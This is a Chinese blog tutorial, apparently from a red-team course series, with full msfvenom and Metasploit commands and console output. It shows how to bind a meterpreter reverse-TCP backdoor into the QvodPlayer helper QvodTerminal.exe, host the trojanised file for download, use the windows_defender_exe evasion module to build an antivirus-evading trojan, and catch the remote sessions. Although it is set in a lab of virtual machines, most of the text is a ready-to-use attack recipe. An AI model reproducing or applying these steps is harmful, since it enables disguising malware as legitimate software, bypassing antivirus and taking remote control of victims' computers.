上节回顾
目录
对 QvodTerminal.exe 注入 payload 后门程序
使用绑定了后门的 QvodTerminal.exe 替换原来的 QvodTerminal.exe
将下载的 QvodTerminal.exe 替换原文件中的 QvodTerminal.exe
2.使用 metasploit 的 evasion 模块生成后门木马
evasion 是 metasploit 自带的模块,使用此模块可以生成反杀毒软件的木马
使用 evasion/windows/windows_defender_exe 这个模块
打开另一个终端,将生成的木马文件复制到 /var/www/html
接着在 win7 浏览器中 打开 http://192.168.1.53/xuegod.exe下载后并且运行即可
➡️ MYSQL REDIS Advance operation
➡️HCIP;H3C-SE;CCIP——LJS[华为、华三、思科高级网络]
1.模拟黑客给真正的快播软件加上后门
先下载一个正常的快播软件
可以下载绿色版本,免安装的快播软件
- 解开这个包后,找到 QvodTerminal.exe
- 先查看主程序会调用哪些附加的小程序,然后把 payload 后门和这些小程序绑定到一起。当然也可
以直接加到主程序上,但是加主程序上,有时报错。- 当 QvodPlayer.exe 主程序运行时,会自动调用 QvodTerminal.exe 这个小程序。
上传到 QvodTerminal.exe 到 kali 上
对 QvodTerminal.exe 注入 payload 后门程序
root@xuegod53:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -b"\x00" -e x86/shikata_ga_nai -i 10 -x QvodTerminal.exe -f exe -o /var/www/html/QvodTerminal.exe
使用绑定了后门的 QvodTerminal.exe 替换原来的 QvodTerminal.exe
- 在 win7 虚拟机上下载绑定了后门的 QvodTerminal.exe
- 在浏览器上访问:http://192.168.1.53/QvodTerminal.exe 并且下载 QvodTerminal.exe
将下载的 QvodTerminal.exe 替换原文件中的 QvodTerminal.exe
在 kali 上开始监听后门
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.53
LHOST => 192.168.1.53
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > run
打开快播主程序准备看苍老师电影
之后回显的窗口点击运行即可
在 Kali 上查看会话已经建立了,说明后门运行成功了
2.使用 metasploit 的 evasion 模块生成后门木马
补充:
evasion 是 metasploit 自带的模块,使用此模块可以生成反杀毒软件的木马
msf6 exploit(multi/handler) > search evasion
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 evasion/windows/applocker_evasion_install_util normal No Applocker Evasion - .NET Framework Installation Utility
1 evasion/windows/applocker_evasion_msbuild normal No Applocker Evasion - MSBuild
2 evasion/windows/applocker_evasion_regasm_regsvcs normal No Applocker Evasion - Microsoft .NET Assembly Registration Utility
3 evasion/windows/applocker_evasion_workflow_compiler normal No Applocker Evasion - Microsoft Workflow Compiler
4 evasion/windows/applocker_evasion_presentationhost normal No Applocker Evasion - Windows Presentation Foundation Host
5 evasion/windows/syscall_inject normal No Direct windows syscall evasion technique
6 exploit/unix/webapp/php_eval 2008-10-13 manual Yes Generic PHP Code Evaluation
7 evasion/windows/windows_defender_exe normal No Microsoft Windows Defender Evasive Executable
8 evasion/windows/windows_defender_js_hta normal No Microsoft Windows Defender Evasive JS.Net and HTA
9 evasion/windows/process_herpaderping normal No Process Herpaderping evasion technique
10 post/windows/gather/checkvm normal No Windows Gather Virtual Environment Detection
Interact with a module by name or index. For example info 10, use 10 or use post/windows/gather/checkvm
msf6 exploit(multi/handler) >
使用 evasion/windows/windows_defender_exe 这个模块
msf6 exploit(multi/handler) > back
msf6 > use evasion/windows/windows_defender_exe
msf6 evasion(windows/windows_defender_exe) > show options
Module options (evasion/windows/windows_defender_exe):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME FpIYCf.exe yes Filename for the evasive file (default: random)
Evasion target:
Id Name
-- ----
0 Microsoft Windows
View the full module info with the info, or info -d command.
msf6 evasion(windows/windows_defender_exe) >
配置文件名参数
set FILENAME xuegod.exe
设置 payload
set payload
设置本地监听 IP 和端口
set LHOST 192.168.1.53
生成木马文件[即执行]
set LPORT 4444
汇总
msf6 evasion(windows/windows_defender_exe) > set FILENAME xuegod.exe
FILENAME => xuegod.exe
msf6 evasion(windows/windows_defender_exe) > set payload
payload =>
msf6 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 evasion(windows/windows_defender_exe) > set LHOST 192.168.1.53
LHOST => 192.168.1.53
msf6 evasion(windows/windows_defender_exe) > set LPORT 4444
LPORT => 4444
msf6 evasion(windows/windows_defender_exe) > run
开启监听后门木马
msf6 > use exploit/multi/handler
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.53
LHOST => 192.168.1.53
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > run
打开另一个终端,将生成的木马文件复制到 /var/www/html
cp /root/.msf4/local/xuegod.exe /var/www/html/xuegod.exe
接着在 win7 浏览器中 打开 http://192.168.1.53/xuegod.exe下载后并且运行即可
在 MSF 终端可以查看到已经建立 session
欢迎各位彦祖与热巴畅游本人专栏与博客
你的三连是我最大的动力
以下图片仅代表专栏特色 [点击箭头指向的专栏名即可闪现]
专栏跑道一
➡️网络空间安全——全栈前沿技术持续深入学习
专栏跑道二
➡️ 24 Network Security -LJS
专栏跑道三
➡️ MYSQL REDIS Advance operation
专栏跑道四
➡️HCIP;H3C-SE;CCIP——LJS[华为、华三、思科高级网络]
专栏跑道五
➡️RHCE-LJS[Linux高端骚操作实战篇]
专栏跑道六
➡️数据结构与算法[考研+实际工作应用+C程序设计]
专栏跑道七
➡️RHCSA-LJS[Linux初级及进阶骚技能]
标签:Metasploit,exe,evasion,windows,payload,QvodTerminal,红队,msf6,木马病毒 From: https://blog.csdn.net/weixin_74796680/article/details/144200508